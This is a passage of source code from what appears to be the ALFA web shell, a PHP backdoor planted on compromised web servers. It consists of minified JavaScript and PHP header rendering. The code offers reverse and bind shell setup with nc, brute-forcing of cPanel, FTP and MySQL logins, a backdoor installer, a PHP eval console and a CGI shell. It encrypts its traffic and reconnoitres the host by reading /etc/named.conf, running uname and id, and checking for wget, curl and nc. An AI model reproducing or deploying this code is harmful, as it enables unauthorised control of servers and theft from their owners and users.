` <font color='red'>>></font> ` button and run ` <font color='red'>nc server_ip port</font> ` on your computer</small>"):(t.style.display="inline-block",a.innerHTML="<small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small>")}function $(e){return d.getElementById(e)}function addnewup(){var e="footerup_"+upcount,a="pfooterup_"+upcount,t=1!=upcount?"pfooterup_"+(upcount-1):"pfooterup",i=d.createElement("p");i.innerHTML='<label class="inputfile" for="'+e+'"><span id="__fnameup'+upcount+'"></span> <strong> Choose a file</strong></label><input id="'+e+'" type="file" name="f[]" onChange="handleup(this,'+upcount+');" multiple>',i.id=a,i.appendAfter($(t)),upcount++}function alfa_searcher_tool(e){switch(e){case"all":case"dirs":_alfaSet(!0,"Disabled");break;case"files":_alfaSet(!1,"php")}}function _alfaSet(e,a){d.srch.ext.disabled=e,d.srch.ext.value=a}function dis_input(e){switch(e){case"phpmyadmin":bruteSet(!0,"Disabled","http://");break;case"direct":bruteSet(!1,"2222","http://");break;case"cp":bruteSet(!1,"2082","http://");break;case"ftp":bruteSet(!0,"Disabled","ftp://");break;case"mysql":bruteSet(!1,"3306","http://");break;case"ftpc":bruteSet(!1,"21","http://")}}function bruteSet(e,a,t){c="21"!=a?"localhost":"ftp.example.com",$("port").disabled=e,$("port").value=a,$("target").value=c,$("protocol").value=t}function inBackdoor(e){"my"==e.value?$("backdoor_textarea").style.display="block":$("backdoor_textarea").style.display="none"}function saveByKey(e){return!("s"==String.fromCharCode(e.which).toLowerCase()&&e.ctrlKey||19==e.which)||($("editor_edit_area").onsubmit(),e.preventDefault(),!1)}function alfaAjaxError(e,a,t,i){if(void 0!==a){var l=d.querySelector("#loader_"+a);null!=l&&(firewall="",403==e&&(firewall=" ~ FireWall Detected!"),l.querySelector("img").remove(),l.querySelector(".alfa-ajax-error").innerHTML=e+" ( "+t+firewall+" )",alfaShowNotification(t,"Ajax","error"))}}function alfaInitCwdContext(){d.querySelectorAll(".header_pwd").forEach(function(e){e.addEventListener("contextmenu",function(e){var a=e.target.getAttribute("path"),t=d.querySelector("#rightclick_menu > a[name=newtab]");t.setAttribute("href","javascript:void(0);"),t.removeAttribute("target"),t.onclick=function(){alfaFilesManNewTab(a,"/")};var i=e.clientX,l=e.clientY;alfaSortMenuItems(["newtab"]),alfaRightClickMenu(i,l),e.preventDefault()})})}function alfaRightClickMenu(e,a){rightclick_menu_context.top=a+"px",rightclick_menu_context.left=e+"px",rightclick_menu_context.visibility="visible",rightclick_menu_context.opacity="1"}function alfaSortMenuItems(e){var a=["newtab","link","download","view","edit","move","copy","rename","modify","permission","compress","extract","delete","view_archive"],t=!1;for(var i in a){for(var l in t=!1,e)a[i]!=e[l]||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="block",t=!0);t||(d.querySelector("#rightclick_menu > a[name="+a[i]+"]").style.display="none")}}function alfaAceChangeSetting(e,a){var t=e.options[e.selectedIndex].value,i=e.getAttribute("base"),l=alfa_ace_editors.editor;"eval"==i&&(l=alfa_ace_editors.eval);var o=e.getAttribute("ace_id");"lang"==a?l[o].session.setMode("ace/mode/"+t):"theme"==a&&l[o].setTheme("ace/theme/"+t),setCookie("alfa_ace_"+a+"_"+i,t,2012)}function alfaAceChangeWrapMode(e,a){var t=alfa_ace_editors.editor;"eval"==a&&(t=alfa_ace_editors.eval);var i=e.getAttribute("ace_id");e.checked?t[i].session.setUseWrapMode(!0):t[i].session.setUseWrapMode(!1)}function alfaAceChangeFontSize(e,a,t){var i=alfa_ace_editors.editor;"eval"==e&&(i=alfa_ace_editors.eval);var l=t.getAttribute("ace_id"),o=i[l].getFontSize();"+"==a?++o:--o,i[l].setFontSize(o),setCookie("alfa_ace_fontsize_"+e,o,2012)}function setCookie(e,a,t){var i=new Date;i.setTime(i.getTime()+24*t*60*60*1e3);var l="expires="+i.toUTCString();document.cookie=e+"="+a+";"+l+";path=/"}function getCookie(e){var a=("; "+document.cookie).split("; "+e+"=");if(2==a.length)return a.pop().split(";").shift()}function editorClose(e){if(d.body.style.overflow="visible",elem=$(e),elem.setAttribute("class","editor-anim-close"),"editor"==e){if(is_minimized=!1,null!=alfa_ace_editors.editor&&null!=alfa_ace_editors.editor){for(var a in alfa_ace_editors.editor)alfa_ace_editors.editor[a].destroy();alfa_ace_editors.editor=null,d.querySelector(".editor-tabs").innerHTML="",d.querySelector(".editor-content-holder").innerHTML=""}}else if("cgiloader"==e)php_temrinal_using_cgi&&(d.querySelector(".terminal-tabs").innerHTML="",d.querySelector(".terminal-contents").innerHTML=""),php_temrinal_using_cgi=!1,cgi_is_minimized=!1;else if("options_window"==e){if(options_window_is_minimized=!1,null!=alfa_ace_editors.eval){for(var a in alfa_ace_editors.eval)alfa_ace_editors.eval[a].destroy();alfa_ace_editors.eval=null,d.querySelectorAll(".php-evals").forEach(function(e){e.removeAttribute("ace")})}}else"database_window"==e&&(database_window_is_minimized=!1);setTimeout(function(){elem=$(e),elem.removeAttribute("class"),elem.style.display="none","options_window"==e&&(elem.querySelector(".options_tab").innerHTML="",elem.querySelector(".options_content").innerHTML="")},1e3),d.body.style.overflow="visible"}function popupWindowBackPosition(){var e={cgiloader:cgi_is_minimized,options_window:options_window_is_minimized,database_window:database_window_is_minimized,editor:is_minimized},a=[];for(var t in e)e[t]&&a.push(t);1==a.length?$(a[0]+"-minimized").style.top="30%":2==a.length?($(a[0]+"-minimized").style.top="20%",$(a[1]+"-minimized").style.top="50%"):3==a.length?($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="60%"):4==a.length&&($(a[0]+"-minimized").style.top="0%",$(a[1]+"-minimized").style.top="30%",$(a[2]+"-minimized").style.top="55%",$(a[3]+"-minimized").style.top="80%")}function showEditor(e){if($(e).setAttribute("class","editor-anim-show"),$(e+"-minimized").setAttribute("class","minimized-hide"),"editor"==e)is_minimized=!1;else if("cgiloader"==e)cgi_is_minimized=!1;else if("options_window"==e){options_window_is_minimized=!1;var a=d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active.tab-is-done");null!=a&&a.classList.remove("tab-is-done")}else"database_window"==e&&(database_window_is_minimized=!1);popupWindowBackPosition(),d.body.style.overflow="hidden"}function editorMinimize(e){$(e).setAttribute("class","editor-anim-minimize"),$(e+"-minimized").setAttribute("class","minimized-show"),"editor"==e?is_minimized=!0:"cgiloader"==e?cgi_is_minimized=!0:"options_window"==e?options_window_is_minimized=!0:"database_window"==e&&(database_window_is_minimized=!0),popupWindowBackPosition(),d.body.style.overflow="visible"}function clearEditorHistory(){if(confirm("Are u Sure?"))for(var e in editor_files)e!=editor_current_file&&removeHistory(e)}function isArchive(e){var a,t=[".tar.gz",".tar.bz2",".tar.z",".tar.xz",".zip",".zipx",".7z",".bz2",".gz",".rar",".tar",".tgz"];for(a in t)if(new RegExp("(.*)("+t[a].replace(/\./g,"\\.")+")$","gi").test(e))return!0;return!1}function editor(e,a,t,i,l,o){if("dir"==o&&".."==e)return!1;if("download"==a)return g("FilesTools",i,e,"download"),!1;var r="",n="",s="",c="",f=d.mf.c.value,_=!0;if(e=e.trim(),0==Object.keys(editor_files).length){var u=getCookie("alfa_history_files");try{for(var p in editor_files=JSON.parse(u))insertToHistory(p,editor_files[p].file,0,editor_files[p].type)}catch(e){}}if("phar://"==e.substr(0,7))f=c_;else if(-1!=e.indexOf("/")){var m=e.split("/");e=m[m.length-1],delete m[m.length-1],f=m.join("/"),islinux&&(f="/"+f)}if(void 0===o&&(o=""),void 0!==i&&null!=i&&0!=i.length&&(f=i.trim()),"auto"==a&&isArchive(e))return alfaSyncMenuToOpt(e,!0),!1;try{for(var v in editor_files)if(editor_files[v].file==decodeURIComponent(e)&&editor_files[v].pwd.replace(/\//g,"")==f.replace(/\//g,"")){_=!1,l=v;break}}catch(e){}if(editor_error=!0,void 0!==t&&0!=t.length&&null!=t&&(r=alfab64(t)),void 0!==l&&null!=l&&0!=l.length)n=alfab64(l),s=l,c=l.replace("file_","");else{var h="file_"+(c=getRandom(10));n=alfab64(h),s=h}var b="editor_source_"+c;if(null==$(b)){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}d.querySelector(".editor-tabs").insertAdjacentHTML("beforeend","<div onclick='editorTabController(this);' opt_id='"+b+"' id='tab_"+b+"' class='editor-tab-name editor-tab-active'>"+decodeURIComponent(e)+" <img opt_id='"+b+"' onclick='closeEditorContent(this,event);return false;' title='[close]' src='http://solevisible.com/icons/menu/delete.svg'></div>"),d.querySelector(".editor-content-holder").insertAdjacentHTML("afterbegin","<div class='editor-contents editor-content-active' id='"+b+"'></div>")}return 0==is_minimized&&"none"==$("editor").style.display?($("editor").style.display="block",showEditor("editor"),alfaloader(b,"block")):(is_minimized&&showEditor("editor"),null!=$(b)?alfaloader(b,"block"):(alfaloader("editor","block"),b="editor")),_Ajax(d.URL,"a="+alfab64("FilesTools")+"&c="+alfab64(f)+"&alfa1="+alfab64(e)+"&alfa2="+alfab64(a)+"&alfa3="+r+"&alfa4="+n+"&alfa5=&alfa6=&alfa7=&alfa8=&alfa9=&alfa10=&&ajax="+alfab64("true"),function(t,i){var l=$("tab_"+i);try{null!=l&&((-1==l.classList.value.indexOf("editor-tab-active")||is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","Editor: "+l.innerText)),is_minimized&&alfaUpdateOptionsBadge("editor"))}catch(t){}if("none"==$("editor").style.display?alfaLoaderOnTop("none"):alfaloader(i,"none"),r.length>0&&"edit"==a)return is_minimized||null!=l&&-1!=l.classList.value.indexOf("editor-tab-active")&&alfaShowNotification("saved...!","Editor"),!1;if(null!=$(i)&&($(i).innerHTML=t),is_minimized&&alfaShowNotification("proccess is done...","Editor: "+decodeURIComponent(e)),$("editor").style.display="block",evalJS(t),alfaLoadAceEditor("view_ml_content"),"delete"!=a&&editor_error){var c=d.getElementsByClassName("is_active");0!=c.length&&(c[0].className="file-holder"),n=s,e=decodeURIComponent(e),!editor_files[n]&&_?(editor_files[n]={file:e,pwd:f,type:o},insertToHistory(n,e," is_active",o),"mkfile"==a&&g("FilesMan",null)):$(n).parentNode.className+=" is_active"}d.body.style.overflow="hidden",d.getElementsByClassName("filestools")[0].setAttribute("fid",n),editor_files[n]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[n].pwd+"/"+editor_files[n].file).replace(/\/\//g,"/")),editor_current_file=n,updateCookieEditor()},!1,b),!1}function alfaLoadAceEditor(e,a){if(void 0===a&&(a=!1),null==$("alfa-ace-plugin")){var t=document.createElement("script");return t.src="https://cdnjs.cloudflare.com/ajax/libs/ace/1.4.11/ace.js",t.id="alfa-ace-plugin",t.onload=function(){alfaLoadAceEditor(e,a)},d.body.appendChild(t),!1}try{"allow"==$(e).getAttribute("mode")&&(a=!1)}catch(e){}if("view_ml_content"==e){null==alfa_ace_editors.editor&&(alfa_ace_editors.editor={});var i=getCookie("alfa_ace_theme_editor"),l=getCookie("alfa_ace_fontsize_editor");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".editor-ace-controller").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=getRandom(10),o=e.querySelector(".view_ml_content");o.setAttribute("id","view_ml_content-"+t),alfa_ace_editors.editor["view_ml_content-"+t]=ace.edit(o),alfa_ace_editors.editor["view_ml_content-"+t].setReadOnly(a),alfa_ace_editors.editor["view_ml_content-"+t].setShowPrintMargin(!1),alfa_ace_editors.editor["view_ml_content-"+t].setTheme("ace/theme/"+i),alfa_ace_editors.editor["view_ml_content-"+t].session.setMode("ace/mode/php"),alfa_ace_editors.editor["view_ml_content-"+t].session.setUseWrapMode(!0),alfa_ace_editors.editor["view_ml_content-"+t].commands.addCommand({name:"save",bindKey:{win:"Ctrl-S",mac:"Cmd-S"},exec:function(e){d.querySelector("#ace-save-btn-"+t).click()}}),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","view_ml_content-"+t),-1!=e.classList.value.indexOf("ace-save-btn")&&e.setAttribute("id","ace-save-btn-"+t)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.editor["view_ml_content-"+t].setFontSize(parseInt(l))},1e3)})}else{null==alfa_ace_editors.eval&&(alfa_ace_editors.eval={});i=getCookie("alfa_ace_theme_eval"),l=getCookie("alfa_ace_fontsize_eval");void 0===i&&(i="terminal"),0==i.length&&(i="terminal"),d.querySelectorAll(".php-evals").forEach(function(e){if(null!=e.getAttribute("ace"))return!1;e.setAttribute("ace","ok");var t=e.querySelector(".php-evals-ace"),o=getRandom(10);t.setAttribute("id","phpeval-"+o),alfa_ace_editors.eval["phpeval-"+o]=ace.edit(t),alfa_ace_editors.eval["phpeval-"+o].setReadOnly(a),alfa_ace_editors.eval["phpeval-"+o].setShowPrintMargin(!1),alfa_ace_editors.eval["phpeval-"+o].setTheme("ace/theme/"+i),alfa_ace_editors.eval["phpeval-"+o].session.setMode("ace/mode/php"),alfa_ace_editors.eval["phpeval-"+o].session.setUseWrapMode(!0),e.querySelector("select.ace-theme-selector").value=i,e.querySelectorAll(".ace-controler").forEach(function(e){e.setAttribute("ace_id","phpeval-"+o)}),void 0!==l&&setTimeout(function(){alfa_ace_editors.eval["phpeval-"+o].setFontSize(parseInt(l))},1e3)})}}function insertToHistory(e,a,t,i){var l="";t&&0!=t&&(l=t);var o=document.createElement("div");o.innerHTML="<div id='"+e+"' class='history' onClick='reopen(this);'><div class='editor-icon'>"+loadType(a,i,e)+"</div><div class='editor-file-name'>"+a+"</div></div><div class='history-close' onClick='removeHistory(\""+e+"\");'>X</div>",o.className="file-holder"+l,o.addEventListener("mouseover",function(){setEditorTitle(e,"over"),this.childNodes[1].style.opacity="1"}),o.addEventListener("mouseout",function(){setEditorTitle(e,"out"),this.childNodes[1].style.opacity="0"});var r=d.getElementsByClassName("history-list")[0];r.insertBefore(o,r.firstChild)}function loadType(e,a,t){"none"==a&&_Ajax(d.URL,"a="+alfab64("checkfiletype")+"&path="+alfab64(editor_files[t].pwd)+"&arg="+alfab64(editor_files[t].file),function(e){$(t).innerHTML="<div class='editor-icon'>"+loadType(editor_files[t].file,e,t)+"</div><div class='editor-file-name'>"+editor_files[t].file+"</div>",editor_files[t].type=e});if("file"==a){a=(a=e.split("."))[a.length-1].toLowerCase();-1==["json","ppt","pptx","xls","xlsx","msi","config","cgi","pm","c","cpp","cs","java","aspx","asp","db","ttf","eot","woff","woff2","woff","conf","log","apk","cab","bz2","tgz","dmg","izo","jar","7z","iso","rar","bat","sh","alfa","gz","tar","php","php4","php5","phtml","html","xhtml","shtml","htm","zip","png","jpg","jpeg","gif","bmp","ico","txt","js","rb","py","xml","css","sql","htaccess","pl","ini","dll","exe","mp3","mp4","m4a","mov","flv","swf","mkv","avi","wmv","mpg","mpeg","dat","pdf","3gp","doc","docx","docm"].indexOf(a)&&(a="notfound")}else a="folder";return'<img src="http://solevisible.com/icons/{type}" width="30" height="30">'.replace("{type}",a+".png")}function updateFileEditor(e,a){var t="id_"+e,i="id_chmode_"+e,l="id_rename_"+e,o="id_touch_"+e,r="id_edit_"+e,n="id_download_"+e,d="id_delete_"+e,s=$(t).getAttribute("ftype");"folder"==s&&(s="dir"),"file"==s?($(t).innerHTML=a,$(t).setAttribute("href","#action=fileman&path="+c_+"/"+a),$(t).setAttribute("onclick","editor('"+a+"','auto','','','','file')"),$(r).setAttribute("onclick","editor('"+a+"','edit','','','','"+s+"')"),$(n).setAttribute("onclick","g('FilesTools',null,'"+a+"', 'download')")):($(t).innerHTML="<b>| "+a+" |</b>",$(t).setAttribute("onclick","g('FilesMan', '"+c_+"/"+a+"')")),$(i).setAttribute("onclick","editor('"+a+"','chmod','','','','"+s+"')"),$(l).setAttribute("onclick","editor('"+a+"','rename','','','','"+s+"')"),$(o).setAttribute("onclick","editor('"+a+"','touch','','','','"+s+"')"),$(d).setAttribute("onclick","var chk = confirm('Are You Sure For Delete # "+a+" # ?'); chk ? g('FilesMan',null,'delete', '"+a+"') : '';"),$(t).setAttribute("fname",a)}function updateDirsEditor(e,a){var t=d.mf.c.value+"/",i=editor_files[e].pwd+"/"+a+"/",l=editor_files[e].pwd+"/"+editor_files[e].file+"/";for(var o in i=i.replace(/\/\//g,"/"),l=l.replace(/\/\//g,"/"),-1!=(t=t.replace(/\/\//g,"/")).search(i)&&(initDir(t.replace(i,l)),d.mf.c.value=t.replace(i,l)),editor_files){var r=editor_files[o].pwd+"/";-1!=(r=r.replace(/\/\//g,"/")).search(i)&&(editor_files[o].pwd=r.replace(i,l))}updateCookieEditor()}function updateCookieEditor(){setCookie("alfa_history_files",JSON.stringify(editor_files),2012)}function setEditorTitle(e,a){if("out"==a&&""!=editor_current_file){var t=d.querySelector(".editor-tab-name.editor-tab-active");e=null!=t?t.getAttribute("opt_id").replace("editor_source_","file_"):editor_current_file}editor_files[e]&&(d.getElementsByClassName("editor-path")[0].innerHTML=(editor_files[e].pwd+"/"+editor_files[e].file).replace(/\/\//g,"/"))}function removeHistory(e){delete editor_files[e],$(e)&&$(e).parentNode.parentNode.removeChild($(e).parentNode);var a=d.getElementsByClassName("filestools")[0];a&&a.getAttribute("fid")==e&&(a.outerHTML=""),editor_current_file==e&&(editor_current_file=""),updateCookieEditor()}function getRandom(e){for(var a="",t="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ",i=void 0===e?20:e;i>0;--i)a+=t[Math.floor(Math.random()*t.length)];return a}function reopen(e){var a=e.getAttribute("id"),t=editor_files[a].pwd,i=editor_files[a].file,l="editor_source_"+a.replace("file_","");null==$(l)?editor(i,"auto","",t,a):editorTabController(l,!0)}function copyToClipboard(e){e=e.getAttribute("ace_id");var a=alfa_ace_editors.editor[e].selection.toJSON();alfa_ace_editors.editor[e].selectAll(),alfa_ace_editors.editor[e].focus(),document.execCommand("copy"),alfa_ace_editors.editor[e].selection.fromJSON(a),alfaShowNotification("text copied","Editor")}function encrypt(e,a){if(null==a||a.length<=0)return null;e=alfab64(e,!0),a=alfab64(a,!0);for(var t="",i="",l=0;l<e.length;)for(var o=0;o<a.length&&(t=e.charCodeAt(l)^a.charCodeAt(o),i+=String.fromCharCode(t),!(++l>=e.length));o++);return alfab64(i,!0)}function reloadSetting(e){return alfaloader(alfa_before_do_action_id,"block"),_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(e.protect.value)+"&alfa2="+alfab64(e.lgpage.value)+"&alfa3="+alfab64(e.username.value)+"&alfa4="+alfab64(e.password.value)+"&alfa5="+alfab64(">>")+"&alfa6="+alfab64(e.icon.value)+"&alfa7="+alfab64(e.post_encrypt.value)+"&alfa8="+alfab64("main")+"&alfa9="+alfab64(e.cgi_api.value)+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e,a){loadPopUpOpTions(a,e),evalJS(e),alfaloader(a,"none")},!1,alfa_before_do_action_id),alfa_before_do_action_id="",0==e.e.value&&1==e.protect.value&&setTimeout("location.reload()",1e3),e.s.value!=e.icon.value&&setTimeout("location.reload()",1e3),!1}function reloadColors(e){var a={};void 0===e?d.querySelectorAll(".colors_input").forEach(function(e){var t=e.getAttribute("target").replace(".","");a[t]=e.value}):a=e;var t=$("use_default_color").checked?"1":"0";_Ajax(d.URL,"a="+alfab64("settings")+"&alfa1="+alfab64(JSON.stringify(a))+"&alfa2="+alfab64(">>")+"&alfa3="+alfab64(t)+"&alfa8="+alfab64("color")+"&c="+alfab64(c_)+"&ajax="+alfab64("true"),function(e){evalJS(e)},!0)}function alfab64(e,a){return void 0!==a||0==post_encryption_mode?window.btoa(unescape(encodeURIComponent(e))):encrypt(e,"<?php echo __ALFA_SECRET_KEY__; ?>")}function evalCss(e){var a=document.createElement("style");a.styleSheet?a.styleSheet.cssText=e:a.appendChild(document.createTextNode(e)),d.getElementsByTagName("head")[0].appendChild(a)}function colorHandlerKey(e){setTimeout(function(a){colorHandler(e)},200)}function colorHandler(e){var a=e.getAttribute("target"),t=e.getAttribute("multi"),l=a.indexOf(":hover");if(t){var o=JSON.parse(atob(t)),r="";for(i in o.multi_selector)r+=i+"{"+o.multi_selector[i].replace(/{color}/g,e.value)+"}";evalCss(r)}-1==l||t?($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,".header_values"==a&&(a=".header,.header_values"),d.querySelectorAll(a).forEach(function(a){a.style.color=e.value})):($("input_"+a.replace(".","")).value=e.value,$("gui_"+a.replace(".","")).value=e.value,evalCss(a+"{color: "+e.value+";}"))}function importConfig(e){var a=e.target,t=new FileReader;t.onload=function(){var e=t.result;try{reloadColors(JSON.parse(e))}catch(e){alert("Config is invalid...!")}$("importFileBtn").value=""},t.readAsText(a.files[0])}function checkBox(e){var a=alfa_current_fm_id,t=e.checked;d.querySelectorAll("#filesman_holder_"+a+" form[name=files] input[type=checkbox]").forEach(function(e){e.checked=t})}function runcgi(e){if($("cgiframe").style.height="unset",d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Cgi Shell",d.querySelector("#cgiloader .opt-title").innerHTML="Cgi Shell",cgi_is_minimized&&cgi_lang==e&&(showEditor("cgiloader"),0==php_temrinal_using_cgi))return!1;php_temrinal_using_cgi=!1,_Ajax(d.URL,"a="+alfab64("cgishell")+"&alfa1="+alfab64(e)+"&ajax="+alfab64("true"),function(a){d.body.style.overflow="hidden",$("cgiloader").style.display="block",d.querySelector("#cgiframe .terminal-tabs").innerHTML="",d.querySelector("#cgiframe .terminal-contents").innerHTML=a,cgi_lang=e,cgi_is_minimized&&($("cgiloader-minimized").setAttribute("class","minimized-hide"),setTimeout(function(){$("cgiloader").removeAttribute("class"),is_minimized&&($("editor-minimized").style.top="30%")},1e3))})}Element.prototype.appendAfter=function(e){e.parentNode.insertBefore(this,e.nextSibling)};
1072</script>
1073<?php echo"<form style='display:none;' id='dlForm' action='' target='_blank' method='post'>
1074<input type='hidden' name='a' value='dlfile'>
1075<input type='hidden' name='c' value=''>
1076<input type='hidden' name='file' value=''>
1077</form>
1078<input type='file' style='display:none;' id='importFileBtn' onchange='importConfig(event);'>
1079<div id='a_loader'><img src='".__showicon('loader')."'></div>";
1080$cmd_uname = alfaEx("uname -a",false,false);
1081$uname = function_exists('php_uname') ? substr(@php_uname(), 0, 120) : (strlen($cmd_uname)>0?$cmd_uname:'( php_uname ) Function Disabled !');
1082if($uname=="( php_uname ) Function Disabled !"){$GLOBALS["need_to_update_header"]="true";}
1083echo '
1084</head>
1085<body bgcolor="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
1086<div id="up_bar_holder"></div>
1087<div class="whole">
1088<form method="post" name="mf" style="display:none;">
1089<input type="hidden" name="a">
1090<input type="hidden" name="c" value="'.$GLOBALS['cwd'].'">';
1091for($s=1;$s<=10;$s++){
1092echo '<input type="hidden" name="alfa'.$s.'">';
1093}
1094echo '<input type="hidden" name="charset">
1095</form>
1096<div id=\'hidden_sh\'><a class="alert_green" target="_blank" href="?solevisible"><span style="color:#42ff59;">'.__ALFA_CODE_NAME__.'</span><br><small>Version: <span class="hidden_shell_version">'.__ALFA_VERSION__.'</span></small></a></div>
1097<div class="header"><table width="100%" border="0">
1098<tr>
1099<td width="3%"><span class="header_vars">Uname:</span></td>
1100<td colspan="2"><span class="header_values" id="header_uname">'.$uname.'</span></td>
1101</tr>
1102<tr>
1103<td><span class="header_vars">User:</span></td>
1104<td><span class="header_values" id="header_userid">'. $uid . ' [ ' . $user . ' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">' . $gid . ' [ ' . $group . ' ]</span> </td>
1105<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>
1106</tr>
1107<tr>
1108<td><span class="header_vars">PHP:</span></td>
1109<td><b>'.@phpversion(). ' </b><span class="header_vars"> Safe Mode: '.$safe_modes.'</span></td>
1110</tr>
1111<tr>
1112<td><span class="header_vars">ServerIP:</span></td>
1113<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).'</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
1114</tr>
1115<tr>
1116<td width="3%"><span class="header_vars">DateTime:</span></td>
1117<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
1118</tr>
1119<tr>
1120<td><span class="header_vars">Domains:</span></td>
1121<td width="76%"><span class="header_values" id="header_domains">';
1122if($GLOBALS['sys']=='unix'){
1123$d0mains = _alfa_file("/etc/named.conf",false);
1124if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
1125$count=0;
1126foreach($d0mains as $d0main){
1127if(@strstr($d0main,"zone")){
1128preg_match_all('#zone "(.*)"#', $d0main, $domains);
1129flush();
1130if(strlen(trim($domains[1][0])) > 2){
1131flush();
1132$count++;}}}
1133echo "$count Domains";}}
1134else{echo("Cant Read [ /etc/named.conf ]");}
1135echo '</span></td>
1136</tr>
1137<tr>
1138<td height="16"><span class="header_vars">HDD:</span></td>
1139<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
1140</tr>';
1141if($GLOBALS['sys']=='unix'){
1142$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
1143if(!@ini_get('safe_mode')){
1144if(strlen(alfaEx("id",false,false))>0){
1145echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
1146$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
1147$x=0;
1148foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
1149if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1150echo '</td>
1151</tr>
1152<tr>
1153<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
1154$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1155$x=0;
1156foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
1157if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
1158echo '</td>
1159</tr>';
1160}else{
1161echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1162}
1163}else{
1164echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
1165}
1166}else{
1167echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
1168echo alfaEx('ver',false,false);
1169echo '</td>
1170</tr> <tr>
1171<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
1172</tr></b>';
1173}
1174$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
1175echo '<tr>
1176<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
1177</tr>
1178<tr>
1179<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></div></td>
1180</tr>
1181<tr>
1182<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
1183</tr>
1184<tr>
1185<td height="11"><span class="header_vars">SoftWare: </span></td>
1186<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
1187</tr>';
1188if($GLOBALS['sys']=="win"){
1189echo '<tr>
1190<td height="12"><span class="header_vars">DRIVE:</span></td>
1191<td colspan="2"><b>'.$drives.'</b></td>
1192</tr>';
1193}
1194echo '<tr>
1195<td height="12"><span class="header_vars">PWD:</span></td>
1196<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="#action=fileman&path='.$GLOBALS['home_cwd'].'" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a></td>
1197</tr>
1198</table>
1199</div>
1200<div id="meunlist">
1201<ul>
1202';
